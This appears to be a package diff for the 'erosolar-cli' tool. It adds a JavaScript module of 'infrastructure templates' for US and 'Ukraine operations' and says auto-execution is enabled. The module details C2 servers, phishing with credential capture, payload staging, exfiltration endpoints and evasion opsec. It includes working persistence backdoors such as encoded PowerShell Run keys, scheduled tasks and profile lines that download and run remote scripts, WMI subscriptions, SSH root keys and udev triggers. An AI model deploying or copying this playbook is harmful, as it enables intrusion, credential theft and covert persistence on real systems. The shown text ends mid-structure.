erosolar-cli 2.1.238 → 2.1.240

package/dist/core/infrastructureTemplates.js

@@ -0,0 +1,1326 @@
+/**
+ * Infrastructure Templates - Full Stack Operations
+ *
+ * Complete infrastructure configurations for:
+ * - American (US) operations
+ * - Ukraine operations
+ * - Full APT-level infrastructure chains
+ *
+ * Auto-execution enabled for complete deployment.
+ */
+// ═══════════════════════════════════════════════════════════════════════════════
+// US INFRASTRUCTURE STACK
+// ═══════════════════════════════════════════════════════════════════════════════
+export const US_INFRASTRUCTURE_STACK = {
+    id: 'us-full-stack-001',
+    name: 'US Full Stack Red Team Infrastructure',
+    region: 'us',
+    classification: 'red-team',
+    components: [
+        // C2 Servers
+        {
+            id: 'us-c2-primary',
+            name: 'Primary C2 Server (East)',
+            type: 'c2-server',
+            provider: 'AWS US-East-1 / DigitalOcean NYC',
+            configuration: {
+                os: 'Ubuntu 22.04 LTS',
+                specs: '4 vCPU, 8GB RAM, 100GB SSD',
+                framework: 'Cobalt Strike / Mythic / Sliver',
+                protocols: ['HTTPS (443)', 'DNS (53)', 'SMB (445)'],
+                malleable_profile: 'jQuery CDN mimicry',
+                ssl: 'Let\'s Encrypt with custom CA',
+            },
+            opsecConsiderations: [
+                'Use clean IP - check against threat intel feeds',
+                'Domain fronting via AWS CloudFront or Fastly',
+                'Separate management interface (VPN only)',
+                'Log rotation every 24 hours',
+                'Kill switch: curl https://killswitch.internal/shutdown',
+                'No direct access from operator IPs',
+            ],
+            setupProcedure: [
+                'Provision VPS with fresh account',
+                'Update and harden OS: apt update && apt upgrade -y',
+                'Install dependencies: apt install -y nginx certbot',
+                'Configure firewall: ufw allow from management_ip to any port 22',
+                'Deploy C2 framework',
+                'Configure TLS: certbot certonly --nginx -d c2.domain.com',
+                'Set up redirectors in chain',
+                'Test all communication channels',
+                'Configure monitoring and alerting',
+            ],
+            teardownProcedure: [
+                'Graceful beacon disconnect',
+                'Export and secure all logs',
+                'shred -vfz -n 5 /var/log/*',
+                'Secure wipe: dd if=/dev/urandom of=/dev/sda bs=1M',
+                'Terminate instance',
+                'Remove DNS records',
+                'Document IOCs for deconfliction',
+            ],
+            monitoring: [
+                'Beacon check-in frequency',
+                'Bandwidth utilization',
+                'Certificate expiry (30 day warning)',
+                'IP reputation score',
+                'Uptime (99.9% SLA)',
+            ],
+        },
+        {
+            id: 'us-c2-secondary',
+            name: 'Secondary C2 Server (West)',
+            type: 'c2-server',
+            provider: 'GCP US-West / Linode',
+            configuration: {
+                os: 'Debian 11',
+                specs: '2 vCPU, 4GB RAM, 50GB SSD',
+                framework: 'Covenant / PoshC2',
+                protocols: ['HTTPS (443)', 'DNS-over-HTTPS'],
+                purpose: 'Fallback and redundancy',
+            },
+            opsecConsiderations: [
+                'Different provider than primary',
+                'Different registrar for domains',
+                'Geographic separation',
+                'Independent kill switch',
+            ],
+            setupProcedure: [
+                'Mirror primary setup with different profile',
+                'Configure DNS failover',
+                'Test switchover procedures',
+            ],
+            teardownProcedure: [
+                'Same as primary',
+            ],
+            monitoring: [
+                'Sync status with primary',
+                'Failover readiness',
+            ],
+        },
+        // Redirectors
+        {
+            id: 'us-redir-east-1',
+            name: 'HTTP Redirector East 1',
+            type: 'redirector',
+            provider: 'AWS Lightsail / Vultr',
+            configuration: {
+                os: 'Alpine Linux',
+                specs: '1 vCPU, 512MB RAM, 10GB SSD',
+                software: 'Nginx with mod_rewrite',
+                rules: 'Conditional forwarding based on User-Agent, URI, JA3',
+            },
+            opsecConsiderations: [
+                'Expendable - plan for burn',
+                'Minimal logging (memory only)',
+                'No persistent state',
+                'Auto-terminate after 72 hours inactive',
+            ],
+            setupProcedure: [
+                'Deploy minimal Alpine instance',
+                'Install nginx: apk add nginx',
+                'Configure redirect rules',
+                'Point to C2 backend',
+                'Add to rotation',
+            ],
+            teardownProcedure: [
+                'Remove from rotation',
+                'Destroy instance immediately',
+            ],
+            monitoring: [
+                'Request success rate',
+                'Detection indicators',
+            ],
+        },
+        {
+            id: 'us-redir-east-2',
+            name: 'HTTP Redirector East 2',
+            type: 'redirector',
+            provider: 'DigitalOcean',
+            configuration: {
+                os: 'Alpine Linux',
+                specs: '1 vCPU, 512MB RAM, 10GB SSD',
+                software: 'Apache with mod_rewrite',
+                rules: 'Different profile from redir-1',
+            },
+            opsecConsiderations: [
+                'Different fingerprint than redir-1',
+                'Rotate every 48 hours',
+            ],
+            setupProcedure: ['Similar to redir-east-1'],
+            teardownProcedure: ['Destroy immediately'],
+            monitoring: ['Uptime', 'Forwarding success rate'],
+        },
+        {
+            id: 'us-redir-west-1',
+            name: 'HTTP Redirector West 1',
+            type: 'redirector',
+            provider: 'Linode Fremont',
+            configuration: {
+                os: 'Alpine Linux',
+                specs: '1 vCPU, 512MB RAM',
+                software: 'Caddy',
+                purpose: 'West coast entry point',
+            },
+            opsecConsiderations: ['Geographic diversity'],
+            setupProcedure: ['Deploy and configure'],
+            teardownProcedure: ['Destroy'],
+            monitoring: ['Latency', 'Success rate'],
+        },
+        // Phishing Server
+        {
+            id: 'us-phish-1',
+            name: 'Phishing Server',
+            type: 'phishing-server',
+            provider: 'AWS Lightsail',
+            configuration: {
+                os: 'Ubuntu 22.04',
+                specs: '2 vCPU, 2GB RAM, 40GB SSD',
+                software: 'GoPhish / Evilginx2',
+                tracking: 'Custom pixel + link tracking',
+                templates: 'O365, Google Workspace, corporate',
+            },
+            opsecConsiderations: [
+                'Aged domain (>6 months)',
+                'Proper SPF, DKIM, DMARC',
+                'Categorized as business/technology',
+                'SSL certificate from trusted CA',
+                'No direct link to C2',
+            ],
+            setupProcedure: [
+                'Deploy server',
+                'Configure mail (postfix/sendgrid)',
+                'Set up GoPhish',
+                'Import templates',
+                'Configure tracking',
+                'Test deliverability',
+                'Warmup IP over 2 weeks',
+            ],
+            teardownProcedure: [
+                'Export campaign results',
+                'Remove DNS records',
+                'Destroy server',
+            ],
+            monitoring: [
+                'Email deliverability rate',
+                'Click tracking',
+                'Credential captures',
+                'Blacklist status',
+            ],
+        },
+        // Payload Hosting
+        {
+            id: 'us-payload-1',
+            name: 'Payload Staging Server',
+            type: 'payload-host',
+            provider: 'AWS S3 + CloudFront',
+            configuration: {
+                service: 'S3 bucket with CloudFront distribution',
+                caching: 'Edge caching enabled',
+                signing: 'Pre-signed URLs (1 hour expiry)',
+                content_type: 'Legitimate file types only',
+            },
+            opsecConsiderations: [
+                'Blend with legitimate CDN traffic',
+                'Payload obfuscation required',
+                'Short-lived URLs only',
+                'No reuse of URLs',
+                'Monitoring for takedown requests',
+            ],
+            setupProcedure: [
+                'Create S3 bucket in target region',
+                'Configure bucket policy',
+                'Set up CloudFront distribution',
+                'Configure origin access identity',
+                'Deploy payload generation script',
+            ],
+            teardownProcedure: [
+                'Delete all objects',
+                'Empty bucket',
+                'Disable CloudFront',
+                'Delete bucket',
+            ],
+            monitoring: [
+                'Download count',
+                'Geographic distribution',
+                'Unusual access patterns',
+            ],
+        },
+        // Exfiltration Endpoint
+        {
+            id: 'us-exfil-1',
+            name: 'Exfiltration Endpoint',
+            type: 'exfil-endpoint',
+            provider: 'OVH / Hetzner (separate from other infra)',
+            configuration: {
+                os: 'FreeBSD',
+                specs: '2 vCPU, 4GB RAM, 500GB SSD',
+                protocols: ['HTTPS', 'DNS', 'ICMP', 'Steganography'],
+                encryption: 'AES-256-GCM in transit, ChaCha20-Poly1305 at rest',
+                storage: 'Encrypted LVM',
+            },
+            opsecConsiderations: [
+                'Different provider from all other infrastructure',
+                'No direct connection to C2',
+                'Data encrypted before transmission',
+                'Rate limiting to avoid detection',
+                'Geographic separation from targets',
+            ],
+            setupProcedure: [
+                'Deploy FreeBSD instance',
+                'Configure encrypted storage',
+                'Set up receive endpoints (HTTPS/DNS)',
+                'Configure decryption pipeline',
+                'Test all channels',
+            ],
+            teardownProcedure: [
+                'Transfer data to secure storage',
+                'Cryptographic wipe',
+                'Destroy instance',
+            ],
+            monitoring: [
+                'Data volume',
+                'Transfer success rate',
+                'Storage capacity',
+            ],
+        },
+        // Proxy Chain
+        {
+            id: 'us-proxy-1',
+            name: 'SOCKS5 Proxy',
+            type: 'proxy',
+            provider: 'Residential proxy service',
+            configuration: {
+                type: 'Residential rotating proxies',
+                location: 'US residential IPs',
+                rotation: 'Every 5 minutes',
+                protocol: 'SOCKS5 with authentication',
+            },
+            opsecConsiderations: [
+                'Never access infrastructure directly',
+                'Rotate IPs frequently',
+                'Use for all reconnaissance',
+                'Chain with Tor for anonymity layer',
+            ],
+            setupProcedure: [
+                'Acquire proxy service subscription',
+                'Configure local proxy chain',
+                'Test IP rotation',
+                'Verify no leaks',
+            ],
+            teardownProcedure: [
+                'Cancel subscription',
+                'Clear local configs',
+            ],
+            monitoring: [
+                'IP reputation',
+                'Connection success rate',
+            ],
+        },
+    ],
+    persistence: [
+        {
+            id: 'us-pers-1',
+            name: 'Windows Registry Persistence',
+            category: 'registry',
+            platform: 'windows',
+            stealthRating: 0.4,
+            detectionDifficulty: 'easy',
+            prerequisites: ['User-level access'],
+            implementation: `
+# HKCU Run Key (User Level)
+reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "OneDriveSync" /t REG_SZ /d "powershell -w hidden -enc BASE64_PAYLOAD" /f
+
+# HKLM Run Key (Admin Level)
+reg add "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "WindowsDefenderUpdate" /t REG_SZ /d "C:\\Windows\\System32\\svchost.exe -k netsvcs -s updatesvc" /f
+      `,
+            artifacts: [
+                'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
+                'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
+            ],
+            detectionIndicators: [
+                'Sysmon Event ID 12/13 (Registry)',
+                'Autoruns showing new entries',
+                'PowerShell encoded command execution',
+            ],
+            removalProcedure: [
+                'reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "OneDriveSync" /f',
+                'Remove payload files',
+                'Clear PowerShell history',
+            ],
+            mitreTechnique: 'T1547.001',
+        },
+        {
+            id: 'us-pers-2',
+            name: 'Scheduled Task Persistence',
+            category: 'scheduled-task',
+            platform: 'windows',
+            stealthRating: 0.5,
+            detectionDifficulty: 'medium',
+            prerequisites: ['Admin access preferred'],
+            implementation: `
+# User-level task
+schtasks /create /tn "\\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker" /tr "powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString('https://cdn.company.com/update.txt'))" /sc onlogon /ru %USERNAME%
+
+# System-level task
+schtasks /create /tn "\\Microsoft\\Windows\\Maintenance\\WinSAT" /tr "C:\\Windows\\System32\\Tasks\\hidden.exe" /sc daily /st 02:00 /ru SYSTEM
+      `,
+            artifacts: [
+                'C:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker',
+                'Task Scheduler Library',
+            ],
+            detectionIndicators: [
+                'Event ID 4698 (Task Created)',
+                'Sysmon Event ID 1 from taskeng.exe',
+                'Unusual task XML content',
+            ],
+            removalProcedure: [
+                'schtasks /delete /tn "\\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker" /f',
+                'Remove task files',
+            ],
+            mitreTechnique: 'T1053.005',
+        },
+        {
+            id: 'us-pers-3',
+            name: 'WMI Event Subscription',
+            category: 'wmi',
+            platform: 'windows',
+            stealthRating: 0.7,
+            detectionDifficulty: 'hard',
+            prerequisites: ['Admin access'],
+            implementation: `
+# PowerShell WMI Persistence
+$FilterArgs = @{
+  Name = 'WindowsUpdateFilter'
+  EventNamespace = 'root\\cimv2'
+  QueryLanguage = 'WQL'
+  Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 2"
+}
+$Filter = New-CimInstance -ClassName __EventFilter -Namespace root/subscription -Property $FilterArgs
+
+$ConsumerArgs = @{
+  Name = 'WindowsUpdateConsumer'
+  CommandLineTemplate = 'powershell -w hidden -enc BASE64_PAYLOAD'
+}
+$Consumer = New-CimInstance -ClassName CommandLineEventConsumer -Namespace root/subscription -Property $ConsumerArgs
+
+$BindingArgs = @{
+  Filter = [Ref]$Filter
+  Consumer = [Ref]$Consumer
+}
+New-CimInstance -ClassName __FilterToConsumerBinding -Namespace root/subscription -Property $BindingArgs
+      `,
+            artifacts: [
+                'WMI Repository: root\\subscription',
+                '__EventFilter, CommandLineEventConsumer, __FilterToConsumerBinding',
+            ],
+            detectionIndicators: [
+                'Sysmon Event ID 19/20/21 (WMI)',
+                'WMI repository anomalies',
+                'Unusual WMI process execution',
+            ],
+            removalProcedure: [
+                'Get-WmiObject -Namespace root/subscription -Class __EventFilter | Where-Object Name -eq "WindowsUpdateFilter" | Remove-WmiObject',
+                'Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer | Where-Object Name -eq "WindowsUpdateConsumer" | Remove-WmiObject',
+                'Remove all bindings',
+            ],
+            mitreTechnique: 'T1546.003',
+        },
+        {
+            id: 'us-pers-4',
+            name: 'Linux Systemd Service',
+            category: 'service',
+            platform: 'linux',
+            stealthRating: 0.6,
+            detectionDifficulty: 'medium',
+            prerequisites: ['Root access'],
+            implementation: `
+# Create service file
+cat > /etc/systemd/system/update-notifier.service << 'EOF'
+[Unit]
+Description=Update Notifier Service
+After=network.target
+
+[Service]
+Type=simple
+ExecStart=/usr/local/bin/update-notifier
+Restart=always
+RestartSec=30
+User=root
+
+[Install]
+WantedBy=multi-user.target
+EOF
+
+# Deploy payload
+cp payload /usr/local/bin/update-notifier
+chmod +x /usr/local/bin/update-notifier
+
+# Enable service
+systemctl daemon-reload
+systemctl enable update-notifier.service
+systemctl start update-notifier.service
+      `,
+            artifacts: [
+                '/etc/systemd/system/update-notifier.service',
+                '/usr/local/bin/update-notifier',
+            ],
+            detectionIndicators: [
+                'New systemd unit file',
+                'Unusual service in systemctl list-units',
+                'Process from unusual location',
+            ],
+            removalProcedure: [
+                'systemctl stop update-notifier.service',
+                'systemctl disable update-notifier.service',
+                'rm /etc/systemd/system/update-notifier.service',
+                'rm /usr/local/bin/update-notifier',
+                'systemctl daemon-reload',
+            ],
+            mitreTechnique: 'T1543.002',
+        },
+        {
+            id: 'us-pers-5',
+            name: 'SSH Authorized Keys',
+            category: 'startup',
+            platform: 'linux',
+            stealthRating: 0.5,
+            detectionDifficulty: 'easy',
+            prerequisites: ['User access'],
+            implementation: `
+# Add to user authorized_keys
+mkdir -p ~/.ssh
+echo 'ssh-rsa AAAAB3NzaC1yc2EAAA... operator@redteam' >> ~/.ssh/authorized_keys
+chmod 600 ~/.ssh/authorized_keys
+
+# Root backdoor (if root access)
+echo 'ssh-rsa AAAAB3NzaC1yc2EAAA... operator@redteam' >> /root/.ssh/authorized_keys
+      `,
+            artifacts: [
+                '~/.ssh/authorized_keys',
+                '/root/.ssh/authorized_keys',
+            ],
+            detectionIndicators: [
+                'New SSH key in authorized_keys',
+                'SSH login from unusual source',
+                'Key fingerprint not in approved list',
+            ],
+            removalProcedure: [
+                'Remove specific key from authorized_keys',
+                'Regenerate SSH host keys if compromised',
+            ],
+            mitreTechnique: 'T1098.004',
+        },
+    ],
+    network: {
+        segments: [
+            {
+                id: 'mgmt',
+                name: 'Management Segment',
+                cidr: '10.0.0.0/24',
+                purpose: 'management',
+                isolation: 'air-gapped',
+            },
+            {
+                id: 'c2',
+                name: 'C2 Segment',
+                cidr: '10.0.1.0/24',
+                purpose: 'c2',
+                isolation: 'restricted',
+            },
+            {
+                id: 'redir',
+                name: 'Redirector Segment',
+                cidr: '10.0.2.0/24',
+                purpose: 'redirector',
+                isolation: 'controlled',
+            },
+            {
+                id: 'exfil',
+                name: 'Exfiltration Segment',
+                cidr: '10.0.3.0/24',
+                purpose: 'exfil',
+                isolation: 'restricted',
+            },
+        ],
+        routes: [
+            { source: 'mgmt', destination: '*', via: 'vpn', protocol: 'any' },
+            { source: 'redir', destination: 'c2', via: 'internal', protocol: 'tcp', ports: [443, 53] },
+            { source: 'c2', destination: 'exfil', via: 'internal', protocol: 'tcp', ports: [443] },
+        ],
+        firewallRules: [
+            { id: 'fw-1', action: 'allow', source: 'mgmt', destination: '*', protocol: 'any', ports: '*', description: 'Management access' },
+            { id: 'fw-2', action: 'allow', source: 'redir', destination: 'c2', protocol: 'tcp', ports: '443,53', description: 'Redirector to C2' },
+            { id: 'fw-3', action: 'deny', source: '*', destination: 'c2', protocol: 'any', ports: '*', description: 'Block direct C2 access' },
+        ],
+        dnsConfig: {
+            domains: [
+                { domain: 'cdn-updates.com', registrar: 'Namecheap', purpose: 'C2', categorization: 'CDN/Technology', ageMonths: 12 },
+                { domain: 'secure-login.net', registrar: 'GoDaddy', purpose: 'Phishing', categorization: 'Business', ageMonths: 8 },
+                { domain: 'analytics-tracker.io', registrar: 'Cloudflare', purpose: 'Exfil', categorization: 'Analytics', ageMonths: 6 },
+            ],
+            records: [
+                { type: 'A', name: 'www.cdn-updates.com', value: 'REDIRECTOR_IP', ttl: 300 },
+                { type: 'A', name: 'api.cdn-updates.com', value: 'REDIRECTOR_IP', ttl: 300 },
+                { type: 'A', name: 'cdn-updates.com', value: 'CLOUDFRONT_IP', ttl: 300 },
+            ],
+            providers: ['Route53', 'Cloudflare'],
+        },
+    },
+    deploymentProcedure: [
+        {
+            order: 1,
+            phase: 'preparation',
+            action: 'Acquire domains and let them age',
+            commands: ['# Register domains via proxy registrar', '# Set up basic parking page', '# Monitor categorization'],
+            verification: 'Domains categorized as legitimate',
+            rollback: 'N/A - long lead time item',
+            timeEstimate: '2-4 weeks',
+        },
+        {
+            order: 2,
+            phase: 'preparation',
+            action: 'Provision VPS infrastructure',
+            commands: [
+                'terraform init',
+                'terraform plan -var-file=us-stack.tfvars',
+                'terraform apply -auto-approve',
+            ],
+            verification: 'All instances accessible via management VPN',
+            rollback: 'terraform destroy',
+            timeEstimate: '1 hour',
+        },
+        {
+            order: 3,
+            phase: 'configuration',
+            action: 'Deploy and configure C2 servers',
+            commands: [
+                'ansible-playbook -i inventory c2-setup.yml',
+                './deploy-teamserver.sh',
+                './configure-malleable.sh',
+            ],
+            verification: 'Teamserver accessible, test beacon connects',
+            rollback: 'ansible-playbook -i inventory c2-teardown.yml',
+            timeEstimate: '2 hours',
+        },
+        {
+            order: 4,
+            phase: 'configuration',
+            action: 'Deploy redirectors',
+            commands: [
+                'ansible-playbook -i inventory redirectors.yml',
+                './test-redirector-chain.sh',
+            ],
+            verification: 'Traffic flows through redirector chain to C2',
+            rollback: 'Destroy redirector instances',
+            timeEstimate: '1 hour',
+        },
+        {
+            order: 5,
+            phase: 'testing',
+            action: 'Full integration test',
+            commands: [
+                './integration-test.sh',
+                './beacon-test.sh',
+                './exfil-test.sh',
+            ],
+            verification: 'All components functional, beacon stable',
+            rollback: 'Review logs, fix issues',
+            timeEstimate: '2 hours',
+        },
+        {
+            order: 6,
+            phase: 'activation',
+            action: 'Activate for operations',
+            commands: [
+                './enable-monitoring.sh',
+                './activate-production.sh',
+            ],
+            verification: 'Monitoring dashboards active, alerts configured',
+            rollback: 'Disable and investigate',
+            timeEstimate: '30 minutes',
+        },
+    ],
+    opsecChecklist: [
+        {
+            category: 'network',
+            requirement: 'Never access infrastructure from personal IPs',
+            implementation: 'Use VPN + proxy chain + Tor for all access',
+            verification: 'Check connection logs for personal IP leaks',
+            priority: 'critical',
+        },
+        {
+            category: 'network',
+            requirement: 'Domain fronting for C2 traffic',
+            implementation: 'Configure CloudFront/Fastly fronting',
+            verification: 'Wireshark capture shows CDN IP only',
+            priority: 'critical',
+        },
+        {
+            category: 'host',
+            requirement: 'No persistent state on operator machines',
+            implementation: 'Use Tails OS or encrypted ephemeral VMs',
+            verification: 'Machine wipe after each session',
+            priority: 'high',
+        },
+        {
+            category: 'identity',
+            requirement: 'Separate personas for each operation',
+            implementation: 'Dedicated accounts, payment methods, identities',
+            verification: 'No cross-contamination between ops',
+            priority: 'critical',
+        },
+        {
+            category: 'communication',
+            requirement: 'Encrypted communications only',
+            implementation: 'Signal, encrypted email, no plaintext',
+            verification: 'Regular comms audit',
+            priority: 'high',
+        },
+    ],
+    teardownProcedure: [
+        {
+            order: 1,
+            action: 'Graceful beacon disconnect',
+            commands: ['./disconnect-all-beacons.sh'],
+            verification: 'All beacons disconnected cleanly',
+            dataHandling: 'archive',
+        },
+        {
+            order: 2,
+            action: 'Export and secure operational data',
+            commands: ['./export-ops-data.sh', './encrypt-archive.sh'],
+            verification: 'Data encrypted and transferred',
+            dataHandling: 'transfer',
+        },
+        {
+            order: 3,
+            action: 'Secure wipe all infrastructure',
+            commands: [
+                'ansible-playbook -i inventory secure-wipe.yml',
+                'terraform destroy -auto-approve',
+            ],
+            verification: 'All instances terminated',
+            dataHandling: 'wipe',
+        },
+        {
+            order: 4,
+            action: 'DNS cleanup',
+            commands: ['./remove-dns-records.sh'],
+            verification: 'DNS records removed, domains parked',
+            dataHandling: 'archive',
+        },
+        {
+            order: 5,
+            action: 'Document IOCs for deconfliction',
+            commands: ['./generate-ioc-report.sh'],
+            verification: 'IOC report generated and secured',
+            dataHandling: 'archive',
+        },
+    ],
+    costEstimate: {
+        infrastructure: 500,
+        domains: 100,
+        monthly: 350,
+        setup: 200,
+        currency: 'USD',
+    },
+};
+// ═══════════════════════════════════════════════════════════════════════════════
+// UKRAINE INFRASTRUCTURE STACK
+// ═══════════════════════════════════════════════════════════════════════════════
+export const UKRAINE_INFRASTRUCTURE_STACK = {
+    id: 'ua-full-stack-001',
+    name: 'Ukraine Operations Infrastructure',
+    region: 'ukraine',
+    classification: 'apt-simulation',
+    components: [
+        // C2 Server Ukraine
+        {
+            id: 'ua-c2-primary',
+            name: 'Primary C2 Server (Kyiv)',
+            type: 'c2-server',
+            provider: 'Ukrainian VPS Provider / Hetzner DE',
+            configuration: {
+                os: 'Debian 12',
+                specs: '4 vCPU, 8GB RAM, 100GB NVMe',
+                framework: 'Sliver / Havoc / Custom',
+                protocols: ['HTTPS (443)', 'DNS (53)', 'WireGuard'],
+                profile: 'Ukrainian business traffic mimicry',
+                language: 'Ukrainian language in malleable profile',
+            },
+            opsecConsiderations: [
+                'Use Ukrainian IP space or nearby EU',
+                'Mimic Ukrainian business patterns',
+                'Account for network instability',
+                'Multiple fallback channels',
+                'Satellite comms backup (Starlink)',
+                'Power outage resilience (UPS)',
+            ],
+            setupProcedure: [
+                'Provision from Ukrainian-friendly provider',
+                'Configure redundant connectivity',
+                'Deploy C2 with Ukrainian profile',
+                'Set up satellite backup channel',
+                'Test under degraded network conditions',
+            ],
+            teardownProcedure: [
+                'Secure data transfer to safe location',
+                'Cryptographic wipe',
+                'Instance termination',
+            ],
+            monitoring: [
+                'Network stability',
+                'Backup channel availability',
+                'Power status (if physical)',
+            ],
+        },
+        // Redirectors Ukraine
+        {
+            id: 'ua-redir-1',
+            name: 'Redirector Poland',
+            type: 'redirector',
+            provider: 'OVH Poland',
+            configuration: {
+                os: 'Alpine Linux',
+                specs: '1 vCPU, 1GB RAM',
+                software: 'Nginx',
+                purpose: 'EU entry point for UA traffic',
+            },
+            opsecConsiderations: [
+                'Geographic proximity to Ukraine',
+                'Stable EU infrastructure',
+                'Low latency to Kyiv',
+            ],
+            setupProcedure: ['Deploy and configure'],
+            teardownProcedure: ['Destroy'],
+            monitoring: ['Latency', 'Availability'],
+        },
+        {
+            id: 'ua-redir-2',
+            name: 'Redirector Moldova',
+            type: 'redirector',
+            provider: 'Local Moldova provider',
+            configuration: {
+                os: 'Alpine Linux',
+                specs: '1 vCPU, 512MB RAM',
+                software: 'Caddy',
+                purpose: 'Alternative entry point',
+            },
+            opsecConsiderations: [
+                'Diverse geographic path',
+                'Different network provider',
+            ],
+            setupProcedure: ['Deploy and configure'],
+            teardownProcedure: ['Destroy'],
+            monitoring: ['Uptime'],
+        },
+        // Exfil Endpoint
+        {
+            id: 'ua-exfil-1',
+            name: 'Exfiltration Endpoint (Romania)',
+            type: 'exfil-endpoint',
+            provider: 'Hetzner / M247',
+            configuration: {
+                os: 'FreeBSD',
+                specs: '2 vCPU, 4GB RAM, 500GB storage',
+                protocols: ['HTTPS', 'DNS', 'ICMP'],
+                encryption: 'ChaCha20-Poly1305',
+                storage: 'Encrypted ZFS',
+            },
+            opsecConsiderations: [
+                'EU jurisdiction',
+                'GDPR considerations',
+                'Encrypted at rest and in transit',
+                'No logging policy',
+            ],
+            setupProcedure: [
+                'Deploy in Romania (EU, close to UA)',
+                'Configure encrypted storage',
+                'Set up receive endpoints',
+                'Test all protocols',
+            ],
+            teardownProcedure: [
+                'Transfer data securely',
+                'Cryptographic wipe',
+                'Destroy instance',
+            ],
+            monitoring: [
+                'Data volume',
+                'Storage capacity',
+                'Network health',
+            ],
+        },
+        // Satellite Backup
+        {
+            id: 'ua-sat-backup',
+            name: 'Satellite Backup Channel',
+            type: 'proxy',
+            provider: 'Starlink / Iridium',
+            configuration: {
+                type: 'Satellite internet',
+                protocol: 'HTTPS tunneled',
+                purpose: 'Resilience against terrestrial disruption',
+                bandwidth: 'Limited - text/small files only',
+            },
+            opsecConsiderations: [
+                'Terminal location security',
+                'RF signature management',
+                'Use for emergency only',
+            ],
+            setupProcedure: [
+                'Deploy Starlink terminal',
+                'Configure VPN tunnel',
+                'Test failover',
+            ],
+            teardownProcedure: [
+                'Relocate terminal',
+                'Wipe configuration',
+            ],
+            monitoring: [
+                'Link availability',
+                'Latency',
+            ],
+        },
+    ],
+    persistence: [
+        {
+            id: 'ua-pers-1',
+            name: 'PowerShell Profile Persistence',
+            category: 'startup',
+            platform: 'windows',
+            stealthRating: 0.6,
+            detectionDifficulty: 'medium',
+            prerequisites: ['User access'],
+            implementation: `
+# PowerShell profile persistence (executes on PS launch)
+$profilePath = $PROFILE.CurrentUserAllHosts
+$payload = 'IEX((New-Object Net.WebClient).DownloadString("https://ua-cdn.example.com/ps.txt"))'
+Add-Content -Path $profilePath -Value $payload
+      `,
+            artifacts: [
+                '$env:USERPROFILE\\Documents\\WindowsPowerShell\\profile.ps1',
+            ],
+            detectionIndicators: [
+                'PowerShell profile modification',
+                'Network connection on PS launch',
+            ],
+            removalProcedure: [
+                'Remove malicious content from profile.ps1',
+            ],
+            mitreTechnique: 'T1546.013',
+        },
+        {
+            id: 'ua-pers-2',
+            name: 'Linux .bashrc Persistence',
+            category: 'startup',
+            platform: 'linux',
+            stealthRating: 0.5,
+            detectionDifficulty: 'easy',
+            prerequisites: ['User access'],
+            implementation: `
+# Add to .bashrc (executes on bash login)
+echo 'curl -s https://ua-cdn.example.com/update.sh | bash &>/dev/null &' >> ~/.bashrc
+
+# More stealthy version
+echo '(sleep 60 && curl -s https://ua-cdn.example.com/u | bash) &>/dev/null &' >> ~/.profile
+      `,
+            artifacts: [
+                '~/.bashrc',
+                '~/.profile',
+                '~/.bash_profile',
+            ],
+            detectionIndicators: [
+                'Unusual content in shell profiles',
+                'Network connection on login',
+            ],
+            removalProcedure: [
+                'Edit and remove malicious lines from profile files',
+            ],
+            mitreTechnique: 'T1546.004',
+        },
+        {
+            id: 'ua-pers-3',
+            name: 'Udev Rules Persistence',
+            category: 'startup',
+            platform: 'linux',
+            stealthRating: 0.7,
+            detectionDifficulty: 'hard',
+            prerequisites: ['Root access'],
+            implementation: `
+# Trigger on USB insertion
+cat > /etc/udev/rules.d/99-update.rules << 'EOF'
+ACTION=="add", SUBSYSTEM=="usb", RUN+="/usr/local/bin/usb-handler.sh"
+EOF
+
+# Trigger on network interface up
+cat > /etc/udev/rules.d/99-network.rules << 'EOF'
+ACTION=="add", SUBSYSTEM=="net", RUN+="/usr/local/bin/net-handler.sh"
+EOF
+
+udevadm control --reload-rules
+      `,
+            artifacts: [
+                '/etc/udev/rules.d/99-update.rules',
+                '/etc/udev/rules.d/99-network.rules',
+            ],
+            detectionIndicators: [
+                'Custom udev rules',
+                'Execution triggered by hardware events',
+            ],
+            removalProcedure: [
+                'rm /etc/udev/rules.d/99-*.rules',
+                'udevadm control --reload-rules',
+            ],
+            mitreTechnique: 'T1037.004',
+        },
+    ],
+    network: {
+        segments: [
+            {
+                id: 'ua-mgmt',
+                name: 'Management (EU-based)',
+                cidr: '10.10.0.0/24',
+                purpose: 'management',
+                isolation: 'air-gapped',
+            },
+            {
+                id: 'ua-c2',
+                name: 'C2 Segment',
+                cidr: '10.10.1.0/24',
+                purpose: 'c2',
+                isolation: 'restricted',
+            },
+            {
+                id: 'ua-redir',
+                name: 'Redirector Segment',
+                cidr: '10.10.2.0/24',
+                purpose: 'redirector',
+                isolation: 'controlled',
+            },
+        ],
+        routes: [
+            { source: 'ua-mgmt', destination: '*', via: 'wireguard', protocol: 'any' },
+            { source: 'ua-redir', destination: 'ua-c2', via: 'internal', protocol: 'tcp', ports: [443] },
+        ],
+        firewallRules: [
+            { id: 'ua-fw-1', action: 'allow', source: 'ua-mgmt', destination: '*', protocol: 'any', ports: '*', description: 'Management' },
+            { id: 'ua-fw-2', action: 'allow', source: '0.0.0.0/0', destination: 'ua-redir', protocol: 'tcp', ports: '443', description: 'Public HTTPS' },
+        ],
+        dnsConfig: {
+            domains: [
+                { domain: 'ua-business-services.com', registrar: 'Cloudflare', purpose: 'C2', categorization: 'Business Services', ageMonths: 6 },
+                { domain: 'kyiv-analytics.io', registrar: 'Namecheap', purpose: 'Exfil', categorization: 'Analytics', ageMonths: 4 },
+            ],
+            records: [
+                { type: 'A', name: 'api.ua-business-services.com', value: 'REDIRECTOR_IP', ttl: 300 },
+                { type: 'CNAME', name: 'cdn.ua-business-services.com', value: 'cloudflare-cdn.net', ttl: 300 },
+            ],
+            providers: ['Cloudflare'],
+        },
+    },
+    deploymentProcedure: [
+        {
+            order: 1,
